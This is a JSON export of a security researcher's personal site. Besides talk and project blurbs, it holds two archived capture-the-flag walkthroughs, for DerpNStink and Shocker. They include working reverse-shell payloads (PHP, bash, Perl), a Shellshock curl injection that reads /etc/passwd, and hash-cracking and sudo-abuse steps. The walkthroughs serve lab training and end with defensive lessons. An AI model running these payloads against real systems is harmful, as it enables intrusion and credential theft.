[{"content":"I\u0026rsquo;m Ben. I\u0026rsquo;m from NYC. I\u0026rsquo;ve worked in cybersecurity for a while now.\n","date":"18 April 2026","externalUrl":null,"permalink":"/about/","section":"Main page content","summary":"About this site/me","title":"About This Site/Me","type":"page"},{"content":" ","date":"18 April 2026","externalUrl":null,"permalink":"/","section":"Main page content","summary":"","title":"Main page content","type":"page"},{"content":"","date":"30 October 2025","externalUrl":null,"permalink":"/tags/bug-bounty/","section":"Tags","summary":"","title":"Bug Bounty","type":"tags"},{"content":"","date":"30 October 2025","externalUrl":null,"permalink":"/tags/project/","section":"Tags","summary":"","title":"Project","type":"tags"},{"content":"Research and other publications\n","date":"30 October 2025","externalUrl":null,"permalink":"/publishing/","section":"Publishing","summary":"Research and other publications","title":"Publishing","type":"publishing"},{"content":"","date":"30 October 2025","externalUrl":null,"permalink":"/tags/publishing/","section":"Tags","summary":"","title":"Publishing","type":"tags"},{"content":" Discover how bug hunting teams, independent researchers, and security teams collaborate to uncover vulnerabilities, protect digital assets, and enhance organizational resilience. Learn how bug bounty programs complement traditional security efforts like penetration testing – and why they’re becoming indispensable in today’s threat landscape. This session discusses the business benefits of being able to triage, prioritize, and manage bug bounty findings effectively, ensuring that security teams focus on what truly matters: how to cut through the noise and build a program that delivers real value.\n","date":"30 October 2025","externalUrl":null,"permalink":"/publishing/bug-bounty-webinar/","section":"Publishing","summary":"A webinar on how bug bounty programs harness crowdsourced security research to uncover vulnerabilities and strengthen organizational resilience. We discuss how to triage, prioritize, and manage findings effectively alongside traditional pentesting.","title":"Reversec Webinar: Going behind the scenes of bug bounty to strengthen enterprise security","type":"publishing"},{"content":"","date":"30 October 2025","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":" Organizations operate bug bounty programs with the hope of crowdsourcing their security, but how exactly do they work? This talk covers possible steps from the moment a researcher submits a report through triage, reward, retesting and resolution based on internal lived experience with large, mature and sophisticated programs. Learn why companies implement these programs, how they can integrate/balance them with traditional penetration testing and the potential pitfalls along the way.\n","date":"30 June 2025","externalUrl":null,"permalink":"/publishing/bug-bounty-behind-the-scenes/","section":"Publishing","summary":"A video of a talk on how bug bounty programs work from researcher submission through triage, reward, retesting, and resolution. Plus, how companies balance them with traditional pentesting and avoid common pitfalls.","title":"Reversec Briefing: Bug Bounty behind the scenes","type":"publishing"},{"content":"An analysis of client-side prototype pollution written by Phil Sofia and I, published originally under WithSecure Labs.\nOffsite Links # Read on Reversec Labs Interactive Demo Archived Version (WithSecure) Archived Demo ","date":"8 September 2022","externalUrl":null,"permalink":"/publishing/prototype-pollution-primer/","section":"Publishing","summary":"A hands-on walkthrough of prototype pollution in JavaScript — how attackers corrupt Object.prototype to achieve DOM-based XSS, with exploit demos and mitigations","title":"Prototype Pollution Primer for Pentesters and Programmers","type":"publishing"},{"content":"","date":"4 December 2019","externalUrl":null,"permalink":"/tags/passwords/","section":"Tags","summary":"","title":"Passwords","type":"tags"},{"content":"My early career magnum opus: Up to 20GB of passwords, sorted by popularity. Make sure your passwords aren’t popular!\nThis has taken on a life of its own, but it\u0026rsquo;s now in places like Seclists and many others. As of this writing, sits at the 8th most starred repo on GitHub with the password tag 💪\nberzerk0/Probable-Wordlists Version 2 is live! Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren\u0026rsquo;t popular! null 9245 1611 ","date":"4 December 2019","externalUrl":null,"permalink":"/projects/probable-wordlists/","section":"Projects","summary":"My early career magnum opus. Wordlists sorted by probability originally created for password generation and testing.","title":"Probable Wordlists","type":"projects"},{"content":"Projects and Tools\n","date":"4 December 2019","externalUrl":null,"permalink":"/projects/","section":"Projects","summary":"Projects page","title":"Projects","type":"projects"},{"content":"Password wordlist generator based on biographical info. An old python project.\nberzerk0/BEWGor Bull\u0026rsquo;s Eye Wordlist Generator - Does your password rely on predictable patterns of accessible info? Python 419 70 ","date":"16 November 2018","externalUrl":null,"permalink":"/projects/bewgor/","section":"Projects","summary":"Bull’s Eye Wordlist Generator - Does your password rely on predictable patterns of accessible info?","title":"BEWGor","type":"projects"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\n","date":"26 March 2018","externalUrl":null,"permalink":"/archive/","section":"Archive","summary":"","title":"Archive","type":"archive"},{"content":"","date":"26 March 2018","externalUrl":null,"permalink":"/tags/archive/","section":"Tags","summary":"","title":"Archive","type":"tags"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nGet the VM here: https://www.vulnhub.com/entry/derpnstink-1,221/\n@securekomodo, the machine\u0026rsquo;s creator, gives us the following:\nYour goal is to remotely attack the VM and find all 4 flags eventually leading you to full root access. Don\u0026rsquo;t forget to #tryharder\nExample: flag1(AB0BFD73DAAEC7912DCDCA1BA0BA3D05). Do not waste time decrypting the hash in the flag as it has no value in the challenge other than an identifier.\nIntroduction # DerpNStink requires knowledge of a wide array of pentesting skills, but doesn\u0026rsquo;t dive particularly deeply into any of them. You will use a plethora of tools, but won\u0026rsquo;t have to go too far past the basics of each to get the job done.\nRegardless, I consider this to be a good \u0026ldquo;self-benchmarking\u0026rdquo; CTF. The sheer number of steps involved pushes it towards the \u0026ldquo;intermediate\u0026rdquo; end of the spectrum, even if each of those steps is pretty straightforward.\nDerpNStink is not a great choice for your first CTF, and I did not explain each step with the first-time reader in mind. All tools and methods used are available by default in Kali.\nI\u0026rsquo;ve blurred out any passwords, hashes or keys that aren\u0026rsquo;t defaults.\n1. Initial Scans # The VM is designed to grab an IP from DHCP, and you\u0026rsquo;ll need find out what that is.\nHit it with a heavy-duty nmap scan for expediency\u0026rsquo;s sake.\nnmap -p- -A 192.168.56.101 -oA nmap_AFullTCP\nFTP at 21 using vsftpd ssh at 22 using Openssh HTTP at 80 using Apache From setting up my own VMs, I know these versions are what Ubuntu uses in a Net Install that includes FTP, ssh and HTTP capabilities. nmap also suggests that the box is running Ubuntu.\nThere\u0026rsquo;s also a robots.txt webpage listing /php/ and /temporary as off-limits.\nBefore filling up in the server access log, we can visit the site like a regular user and try to gain information quietly.\nhttp://192.168.56.101/\nThe obscure-hint part of my brain sounds a quiet alarm at the name \u0026ldquo;DerpNStink\u0026rdquo;\nCould Derp N\u0026rsquo; Stink lead to DNS?\nSeems pretty thin, especially since I recognize the character on the left as the South Park character Mr. Derp, whose \u0026ldquo;antics go straight to the funnybone.\u0026rdquo;\nI\u0026rsquo;ll label this as \u0026ldquo;likely a coincidence,\u0026rdquo; while fighting the urge to try funnybone as the root password.\nLet\u0026rsquo;s visit the areas prohibited by robots.txt\nhttp://192.168.56.101/php/\nThere isn\u0026rsquo;t anything here that we don\u0026rsquo;t already know, so we\u0026rsquo;ll check /temporary.\nWhen we do, we see it\u0026rsquo;s just a text page saying Try Harder!\nWhen we see trolling like this, we need to keep investigating. Taunts like this may cause you to storm off in a huff of incredulity without digging deeper, but beneath the hijinks are a great place to hide something of value.\nWith this in mind, I looked at the source code of the page and found precisely nothing.\nI managed to get trolled twice by the same page, impressively. However, I took this opportunity to view the source code of the index page.\nWe see some js and css directories that might be worth digging in to, but the link to /webnotes/info.txt is most interesting.\nBy looking at the line numbers, we can see there is more to this page than what is initially displayed\u0026hellip;\nflag1 Captured! One down, three to go.\nWhat\u0026rsquo;s at that interesting link?\n2. Maybe \u0026ldquo;DerpNStink\u0026rdquo; Did Actually Hint at \u0026ldquo;DNS\u0026rdquo; # view-source:http://192.168.56.101/webnotes/info.txt\nThis lead to another all-text page that contained the following message: \u0026lt;-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live --\u0026gt;\nWe must have to update our hosts file to get the full DerpNStink experience. But what should we use as a hostname? Maybe the /webnotes directory itself can offer a clue.\nview-source:http://192.168.56.101/webnotes/\nPaydirt. This page gives us 2 useful pieces of information:\nHostname: derpnstink.local Username: stinky@derpnstink.local Add derpnstink.local to your /etc/hosts file with\necho \u0026quot;\u0026lt;DERPNSTINK IP ADDR\u0026gt; derpnstink.local\u0026quot; \u0026gt;\u0026gt; /etc/hosts\nYou better use \u0026gt;\u0026gt; and NOT \u0026gt; or you will overwrite your hosts file and have problems.\nNow we know that we are directed to the full version of the website, we\u0026rsquo;ll run nikto.\nnikto -h derpnstink.local -o nikto_hostadded_result.txt\n3. DeRPnStiNK Professional Services: The Blog # Nikto thinks the /weblog/ directory might be interesting.\nWe can take this time to read all about Misters Derp and Stinky and their colorful pasts, but the most interesting thing on the page is the phrase Proudly Powered by Wordpress.\nEnter wpscan\nwpscan -u http://derpnstink.local/weblog/ --enumerate upt\nWPScan delivers tons of useful information. The site is running on an outdated version of Wordpress, and contains a plugin with an Arbitrary File Upload vulnerability. Arbitrary File uploads usually mean shells.\nWe\u0026rsquo;ve also got two usernames, unclestinky and admin. Admin looks like a default user account, and default user accounts often have default passwords.\nhttp://derpnstink.local/weblog/wp-login.php\nadmin:admin\nAnd we\u0026rsquo;re in.\n4. Sliding Our Way Into a User Shell # Surprisingly, we don\u0026rsquo;t have the site\u0026rsquo;s admin control page. This user only has access to one of the plugins.\nBut not just any plugin, the vulnerable plugin. The one we use will to upload a shell payload.\nThe WPScan result listed that we could find vulnerability details at https://www.exploit-db.com/exploits/34514/, but it is a bit faster to just run\u0026hellip;\nsearchsploit -x 34514\nThe details tell us that this is a very straightforward Arbitrary File Upload, and we just need to follow some simple steps.\nUpload a \u0026ldquo;New Slide\u0026rdquo; Using the plugin Choose the FILE.php containing our payload instead of an image. The file will be accessible at http://derpnstink/wordpress/wp-content/uploads/slideshow-gallery/FILE.php Let\u0026rsquo;s do this.\nOur payload will be the php-reverse-shell from pentestmonkey.net, that can be found on Kali at /usr/share/webshells/php/php-reverse-shell.php. Copy it to your working directory.\ncp /usr/share/webshells/php/php-reverse-shell.php .\nEdit the shell using your favorite text editor so it will connect to your local machine at the correct IP and port.\nset_time_limit (0); $VERSION = \u0026#34;1.0\u0026#34;; $ip = \u0026#39;local.machine.ip.addr\u0026#39;; // CHANGE THIS $port = PORTNUM; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = \u0026#39;uname -a; w; id; /bin/sh -i\u0026#39;; $daemon = 0; $debug = 0; Start your listener before uploading the shell.\nnc -lnvp PORTNUM\nClick on the Slideshow Plugin Panel, and hit the Add New button.\nPopulate the title and description fields and upload the shell file.\nIf your listener is running and you\u0026rsquo;ve set the parameters correctly, the shell will pop as soon as you press \u0026ldquo;Save Slide\u0026rdquo;.\nIn fact, if I needed to, I could just refresh the slideshow plugin page if I needed to resend the shell command. This must be because the plugin control page attempts to show a preview of the image.\nCheck for python, and when you find it, use it to spawn a tty.\nwhich python python -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;)'\n5. Science 101 with Professor www-data # Enumeration starts in the home.\nls -l /home\nWe don\u0026rsquo;t have any permissions in the user folders, but that\u0026rsquo;s not what www-data is for. It is used to manage the database and other files used to run the Wordpress site. Therefore, we should try acting like www-data user and poke around in the website directories.\nIt\u0026rsquo;s time to perform some science. I present two hypotheses:\nObservations #1\nwww-data performs operations needed to run Wordpress site Wordpress uses MySQL MySQL must be logged into using credentials Hypothesis #1\nwww-data must \u0026ldquo;know\u0026rdquo; these credentials to access the MySQL database Observations #2\nwww-data can read files in the /var/www/html/weblog directory where Wordpress is installed One of the files in this directory is called wp-config.php \u0026ldquo;Config\u0026rdquo; is short for \u0026ldquo;configuration\u0026rdquo; Hypothesis #2\nwww-data reads MySQL login credentials from /var/www/html/weblog/wp-config.php, and this would fall under \u0026ldquo;configuration.\u0026rdquo; As a good www-data user, it\u0026rsquo;s our place, nay, our DUTY to look for credentials inside this file. All good science requires experimentation.\ncd /var/www/html ls cd weblog ls\nless wp-config.php\nOur experiment is a great success! You should receive your Nobel prize in the mail in 6-8 weeks.\nWe\u0026rsquo;ve learned that we can log into MySQL using root:mysql The root username is very promising, we probably have total database access.\n6. Raiding MySQL # mysql -u root -p\nUse mysql as the password.\nWith root access we have a buffet of data at our fingertips.\nshow databases;\nIf we can find login credentials, we\u0026rsquo;ll use them to attempt to login to ssh or Wordpress.\nuse wordpress;\nWordpress hashes take a while to try and crack, but we\u0026rsquo;ll see if we can find them anyway.\nshow tables;\nshow columns from wp_users; select user_login,user_pass from wp_users\nIf you look closely and see the \u0026ldquo;flag2\u0026rdquo; column, you are more observant than I was! We\u0026rsquo;ll come back to that later.\nSave the user login and user password columns to a local file so we have the option to try and crack the hashes. We already know admin\u0026rsquo;s Wordpress password, so it won\u0026rsquo;t take too long to make a decent effort on unclestinky\u0026rsquo;s hash.\nLet\u0026rsquo;s see what\u0026rsquo;s in the database called mysql.\nshow databases; use mysql; show tables;\nMySQL hashes are not very computationally expensive, so we\u0026rsquo;ll try to crack them before making any attempts on the Wordpress hashes.\nshow columns from user; select User,Password from user;\nSave these to a local file, and call it mysql_db.txt and we\u0026rsquo;ll feed them to John The Ripper. john is a bit of a picky eater, though, so we need to conform them to the username:hash format.\nWe can do this with a beastly one-liner that uses cat, grep, tr, cut and sort.\ncat mysql_db.txt | egrep -i '[a-f0-9]{32}' | tr -d [[:blank:]] | tr '|' ':' | cut -d ':' -f 2,3 | sort -u \u0026gt; mysql_hashes.txt\nI\u0026rsquo;ve broken down the one-liner into stages so you can see how we arrived at the final product. I\u0026rsquo;m not certain that it is the most efficient, shortest possible command, but it works.\nWe\u0026rsquo;ll use the trusty rockyou wordlist that comes with Kali, and is the agreed upon wordlist for CTF-ing. You can find it in /usr/share/wordlists/, but you may have to unarchive it.\njohn mysql_hashes.txt --format=mysql-sha1 --wordlist=/usr/share/wordlists/rockyou.txt\nWe crack 2 of the hashes, and come away with UncleStinky\u0026rsquo;s password. There is a good chance that UncleStinky uses this password everywhere, and it may be his user password.\nWe already know that there is a stinky user on this machine, so let\u0026rsquo;s try to su our way over.\nexit su stinky\n7. The Key is Guarded By A Troll(ing Attempt) # We are stinky, but so is this shell. Let\u0026rsquo;s try to login to ssh now that we\u0026rsquo;ve got the password.\nssh stinky@derpnstink.local\nWe need to dig up the ssh key. Odds are it is in stinky\u0026rsquo;s\u0026rsquo; home directory.\ncd ~ ls ls *\nA flag has been left here for us to Capture.\ncat Desktop/flag.txt\nThe output of this cat shows text that includes flag3(...)\nUh oh, the last one we captured was flag1. I suppose we missed flag2. We\u0026rsquo;ll likely have an easier time finding i as root, so we\u0026rsquo;ll simply continue down the path to pwnership.\n2 flags down, 2 flags to go.\nIn addition to Desktop/flag.txt, we also see Documents/derpissues.pcap. That may contain valuable information; we will investigate shortly. For now, we want that ssh key. It might be in the ftp files, so let\u0026rsquo;s dig.\nls ftp/files ls ftp/files/ssh ls ftp/files/ssh/ssh\nVery funny, stinky. I get the feeling we are being trolled, but that\u0026rsquo;s reason to continue. Luckily, we know that ls has the recursive -R flag.\nThe presence of the network-logs folder further suggests that the pcap file will have something important to offer.\nls -R ftp/files/ssh\nYes, that\u0026rsquo;s seven directories deep.\ncd ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh\nI fully expect this to be a text document containing the message this isn't the ssh key with an ASCII middle finger.\ncat key.txt\nIt\u0026rsquo;s actually a key, hooray! Send it to your local machine using nc and we should be able to log in to ssh.\nFirst, we need to see if stinky can use nc. In the stinkshell, run a which command.\nwhich nc\nThis will show that nc is there for us to use.\nSet up the listener on your local machine, making sure to use a different port than you used for the php-reverse-shell.\nnc -lnvp PORTNUMBER \u0026gt; key.txt\nSend the file from the stinkshell over to your local machine.\nnc local.machine.ip.addr PORTNUMBER \u0026lt; key.txt\nWhen you receive the key, you\u0026rsquo;ll need to change the file permissions or ssh will complain.\nchmod 600 key.txt\nInclude the -i flag with your ssh command to use the key.\nssh stinky@derpnstink.local -i key.txt\n8. Sniffing with \u0026ldquo;Stinky\u0026rdquo; # We\u0026rsquo;ve got a good shell now, let\u0026rsquo;s see if stinky can run sudo with anything interesting.\nsudo -l\nThis results in a message saying that we stinky is unable to run sudo.\nThe derpissues.pcap file is waiting for us, but pcap files can be pretty extensive. It can be hard to find the right packets amongst everything flying around.\nMaybe the /ftp/files/network-logs directory can help provide context.\nls /ftp/files/network-logs\nIn that folder is a file named derpissues.txt. Let\u0026rsquo;s take a peek.\ncat ftp/files/network-logs/derpissues.txt\nIf Mr. Derp set up a Wordpress user account while the network was being sniffed, then there will be a packet containing the password to his account.\nWe can use the same nc process we used to transfer the ssh key to transfer derpissues.pcap to our local machine. From there, we can open it up in wireshark hunt down those credentials.\ncd Documents ls\nEnable the listener on your local machine:\nnc -lnvp 53000 \u0026gt; derpissues.pcap\nStart the transfer from the stinky ssh shell:\nnc 192.168.56.1 53000 \u0026lt; derpissues.pcap\nUpon arrival, open it on your local machine using wireshark:\nwireshark derpissues.pcap\nA lot of info was captured in this file, but we only care about Mr. Derp\u0026rsquo;s interaction with the Wordpress site over http. Even more specifically, we only care about information Mr. Derp sent to the server via POST request.\nWith the right filter, Wireshark will only show us these requests.\nhttp.request.method == \u0026quot;POST\u0026quot;\nThere weren\u0026rsquo;t very many sent, so we can simply browse the Info column for something interesting.\nuser-new.php sounds like the page Mr. Derp would send a request to in order to create his account. This would be where he\u0026rsquo;d enter in his password.\nSelect the HTML Form URL encoded part of the packet, and look at the values. There, in the clear, is Mr. Derp\u0026rsquo;s rather unsurprising password. Unfortunately, it was not funnybone.\nThis is why we use HTTPS.\nIf mrderp is anything like stinky, he will reuse passwords. Simply su your way to mrderp account from the ssh window.\nsu mrderp\n9. If You Like sudo, Then You\u0026rsquo;re Gonna Love Mr. Derp! # If stinky acted as the webmaster, then perhaps mrderp is the boss of this machine.\nsudo -l\nWhen I saw this, I was shocked, appalled, and delighted. Does the sudoers file allow WILDCARDS? Dangerous.\n(ALL) /home/mrderp/binaries/derpy* means that anything we put in the /home/mrderp/binaries directory with a filename that begins with derpy can be run as root.\nWe want a root shell, so we just need to create a little script that spawns one.\nmkdir binaries cd binaries nano derpyshell.sh\nWe just need a crunchbang and a shell command.\n#!/bin/sh /bin/bash To save and exit nano, press ctrl+x,Y, and enter.\nFinally, make the script executable.\nchmod +x derpyshell.sh\nRun it with sudo, and you\u0026rsquo;ll be root.\nsudo ./derpyshell.sh\n10. Final Flag Roundup # flag4 is kept in the /root directory, so head on over and read it with cat.\n3 down, one to go. We have flags 1, 3 and 4 - but where is flag2?\nSince we found flag1 on the website, and flag3 was found while accessing the machine as stinky, I concluded that flag3 must be between those two two points.\nThis corresponded to the parts where we enumerated the website, found the blog, spawned our php-shell, and raided the databases. All of these actions were related to files kept in /var/www/html, which as root, we have complete control over.\nThe flags used the flagN format, so we should head over to the directory and grep for flag2.\ncd /var/www/html/ grep -iR 'flag2' *\nNothing jumps out from this search, but there is still a decent chance the flag is on the website somewhere. Where haven\u0026rsquo;t we looked? Hmm..\nAs soon as we cracked stinky\u0026rsquo;s password, we logged right into ssh. We never even tried to log into his Wordpress account.\nUncleStinky is the Wordpress Admin, and he has saved a draft of a blog post. That draft is named \u0026ldquo;Flag.txt,\u0026rdquo; and contains the elusive flag2.\nAll Flags Captured!\nPost-Mortem # Like most CTFs, this box was intentionally made vulnerable for fun\u0026rsquo;s sake. However, all of these vulnerabilities can be found in the real world.\nHere\u0026rsquo;s what made DerpNStink rootable.\nUse of Default/Obvious Credentials\nadmin:admin logged into Wordpress. This really can be found in the real world. Just ask Equifax Argentina. root:mysql was all it took to get complete control of the MySQL database. Least Privilege Violations\nThe admin Wordpress user did not have administrative control over the site, but could still control the Slideshow plugin. While logged into the system as www-data, we could look at stinky\u0026rsquo;s home directory. Why would this be necessary? Outdated Versions of Plugins/3rd Party Software\nThe slideshow plugin was using a vulnerable version from 2014, which has since been patched. While this version was obviously put in place to allow Arbitrary File Upload for the CTF, real webmasters may think maintenance of 3rd Party software isn\u0026rsquo;t their problem. Vendors can release a patch, but the sysadmin must actually install it. Credential Reuse\nBoth users of this system had one single password that was used to for both Wordpress and system access. Unfortunately, this practice is as common as it is dangerous. Weak Passwords\nstinky\u0026rsquo;s password (they only used one) was entirely alphanumeric, and used the minimum number of characters commonly allowed. Since we were likely meant to crack this password from a hash, it was also part of the famous rockyou wordlist. Lack of HTTPS\nmrderp\u0026rsquo;s password had a very secure length of 28 characters - we weren\u0026rsquo;t going to find it via brute force. However, the password was sniffed out using packet capture due to the fact that the web page used unencrypted HTTP. Thanks for reading! # ","date":"26 March 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/derpnstink-vulnhub/","section":"Archive","summary":"","title":"CTF Writeup: DerpNStink on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nThese aren’t the only CTF’s I’ve ever done, of course.\n","date":"26 March 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/","section":"Archive","summary":"Write-ups/Walkthroughs of CTF challenges from 2017 and 2018","title":"CTF Writeups","type":"archive"},{"content":"","date":"26 March 2018","externalUrl":null,"permalink":"/tags/ctf-writeup/","section":"Tags","summary":"","title":"Ctf-Writeup","type":"tags"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # Shocker is one of those CTF\u0026rsquo;s designed to give the player first-hand experience implementing a famous vulnerability. Like Blue before it, it is a beginner CTF that requires prior knowledge or a bit of outside-the-box thinking.\nThe severity of these vulnerabilities is what made them so famous, and once you\u0026rsquo;ve employed them, root access is not far behind. Shocker\u0026rsquo;s root doesn\u0026rsquo;t crack exactly as easily as Blue\u0026rsquo;s, but is still a trivial privesc.\nThis write up assumes that the reader is using Kali, but any pentesting distro such as BlackArch will work.\n1. Initial Scans # A quick nmap scan starts us off on the right foot.\nnmap -F -sV 10.10.10.56 -oG nmap_quicksearch We\u0026rsquo;ll write the output to a grep-able format using the -oG flag.\nStarting Nmap 7.60 \\( https://nmap.org ) at 2018-02-17 13:36 EST Nmap scan report for 10.10.10.56 Host is up (0.036s latency). Not shown: 99 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.08 seconds Looks like HTTP is the way to move forward. If we hit a brick wall, we\u0026rsquo;ll come back and scan more ports.\nnikto and dirsearch are the HTTP-scanning gruesome twosome. Let\u0026rsquo;s set them loose.\nnikto -h 'http://10.10.10.56' -o nikto_result.txt - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.56 + Target Hostname: 10.10.10.56 + Target Port: 80 --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + Server leaks inodes via ETags, header found with file /, fields: 0x89 0x559ccac257884 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found. + 8310 requests: 0 error(s) and 6 item(s) reported on remote host --------------------------------------------------------------------------- + 1 host(s) tested nikto has told us the same information that the nmap quickscan has, but not much else.\nThe box runs Apache 2.4.18 The box runs Ubuntu We\u0026rsquo;ll start with the shallowest dirsearch scan, and dive deeper if necessary.\ndirsearch -u 'http://10.10.10.56' -e php,html,js,txt --plain-text-report = dirsearch_quick _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: php, html, js, txt | Threads: 10 | Wordlist size: 6996 Target: http://10.10.10.56 ...(some uninteresting results)... [13:41:31] 403 - 294B - /cgi-bin/ [13:41:37] 200 - 137B - /index.html [13:41:44] 403 - 299B - /server-status [13:41:44] 403 - 300B - /server-status/ Those directories are the most interesting, but let\u0026rsquo;s try our patented \u0026ldquo;dual bio-optical scan.\u0026rdquo;\nThis creature wants to be left alone and appears willing to defend itself with that hammer if needed.\nWhat a strange little image.\nWe can download it and check it for steganography, but I wasn\u0026rsquo;t able to find anything. Since this image is our only lead on the webpage, it is worth further investigation. Take a page from the OSINT book and hit it with a reverse image search.\nHmm\u0026hellip; these results aren\u0026rsquo;t very specific. Maybe we can add more detail to our search and get better results.\nOur bug has a message for us, \u0026ldquo;Don\u0026rsquo;t bug me!\u0026rdquo;\nAt first, these results seem similar to our first search. They might even be worse. However, a very interesting result lies just a scroll down the page.\nThe included text tells a very interesting story: The Bash Bug - also going by the nickname \u0026ldquo;Shellshock\u0026rdquo; - has been discovered this week and identified as a serious threat to computers of al kinds\u0026hellip;\nWe\u0026rsquo;d like to pose a \u0026ldquo;serious threat\u0026rdquo; to this CTF, and with a box name of Shocker, we just might.\n2. Bashing the Bug/Shocking the Shell # We originally found the image at this Slashgear article, which itself linked to this SecLists post. The SecLists post explained that using a clever combination of curly brackets and semicolons in an HTTP request, we may be able to get code injection on a webserver.\nOur box is nothing but a webserver, as far as we can tell. We can use curl to send custom HTTP requests, as soon as we find out just where they should go.\nSome more searching lead me to this GitHub page by opsxcq which outlined a beautiful one-line command to read the /etc/passwd file of a system vulnerable to ShellShock.\ncurl -H \u0026#34;user-agent: () { :; }; echo; echo; /bin/bash -c \u0026#39;cat /etc/passwd\u0026#39;\u0026#34; \\ http://localhost:8080/cgi-bin/vulnerable Where could our /vulnerable file be?\nIn order to use ShellShock, we need to aim our request at a shell script. Shell scripts often carry the .sh extension, and are used to run commands directly in the system shell. The /cat/passwd example used a /cgi-bin/ directory, which we have already discovered exists on our box as well. We can point dirsearch at our box\u0026rsquo;s /cgi-bin/ directory and tell it to look for files with the sh extension.\ndirsearch -u 'http://10.10.10.56/cgi-bin/' -e sh --plain-text-report=dirsearch_shellsearch Hello there\u0026hellip;\nWe can alter opsxcq\u0026rsquo;s one liner to include the correct HTTP location and give it a test run.\ncurl -H \u0026quot;user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'\u0026quot; 'http://10.10.10.56/cgi-bin/user.sh' We\u0026rsquo;ve done it, command injection. Time to drop in a revere shell command.\nFirst, start your listener.\nnc -lnvp PORTNUM Then, bundle a reverse shell command into the ShellShock one liner, and run it in another terminal.\ncurl -H \u0026quot;user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i \u0026gt;\u0026amp; /dev/local.machine.HTB.ip/PORTNUM 0\u0026gt;\u0026amp;1'\u0026quot; \\http://10.10.10.56/cgi-bin/user.sh\n3. A User Named \u0026ldquo;Shelly\u0026rdquo; - GET IT? # Retrieve the user flag.\nls ~ cat ~/user.txt shelly@Shocker:/home/shelly$ ls ~ user.txt shelly@Shocker:/home/shelly$ cat ~/user.txt User Flag Captured!\nTime to see what Shelly can do besides make puns.\nsudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl Shelly can run perl as root using sudo without a password!\nAll that stands between us and a root shell is finding the right command.\nFrom my trusty Red Team Field Manual by Ben Clark, I found this:\nperl -e 'use Socket;$i=\u0026quot;local.machine.ip.addr\u0026quot;;$p=PORTNUM;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\u0026quot;tcp\u0026quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);open(STDOUT,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);open(STDERR,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);exec(\u0026quot;/bin/sh -i\u0026quot;);};'\nStart a second listener on your local machine at a new port, then run the command below.\nsudo perl -e 'use Socket;$i=\u0026quot;local.machine.HTB.ip\u0026quot;;$p=PORTNUM_B;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\u0026quot;tcp\u0026quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);open(STDOUT,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);open(STDERR,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);exec(\u0026quot;/bin/sh -i\u0026quot;);};'\n4. Root Flag # We\u0026rsquo;re the boss.\nls ~ cat ~/root.txt # ls ~ root.txt # cat ~/root.txt Root Flag Captured!\nConclusion # When doing CTFs, you have the benefit of decades of security history to support you. There is no substitute for experience, but browsing through the timeline of major cybersecurity stories might just be the next best thing. Studying bugs like this give you an idea of real-world scenarios and what kinds of attacks actually have worked.\nThanks to HackTheBox and mrb3n!\nThanks for reading! # ","date":"17 February 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/shocker-htb/","section":"Archive","summary":"","title":"CTF Writeup: Shocker on HackTheBox","type":"archive"},{"content":"","date":"8 February 2018","externalUrl":null,"permalink":"/blog/","section":"Blogs","summary":"","title":"Blogs","type":"blog"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nMake your passwords secure, and keep them that way!\nDo you know how to create a secure password? # Did you know that many people use the same passwords and a savvy guesser goes for these first? Do you know that password length can be the easiest way to be more secure? Do you re-use passwords across multiple accounts? # DO NOT RE-USE PASSWORDS ACROSS ACCOUNTS. Full stop. Don\u0026rsquo;t do it. Seriously. Password conventions can help you remember as many unique passwords as you want. I\u0026rsquo;ll tell you how to set one up. Do you know about 2-Factor Authentication? # In some cases, it can keep you safe even if your password is compromised. Take These Small Steps to Vastly Increase Your Password Security # Even if you have no reason to think you have been compromised # TURN ON TWO-FACTOR AUTHENTIFICATION Change Your LinkedIn Password - Why? Consider signing up at https://haveibeenpwned.com/ to know be alerted your info gets leaked. Consider running your information through Hacked-Emails If you are guilty of password reuse - stop it. Change those passwords, as soon as possible. Two-factor authentication adds another step to your security. If someone (including you) wants to log in to an account on a new device, it will generate a confirmation code only lasts a few minutes that only you will have access to. Either way, you will know if someone is trying to log on to your account using a device that you 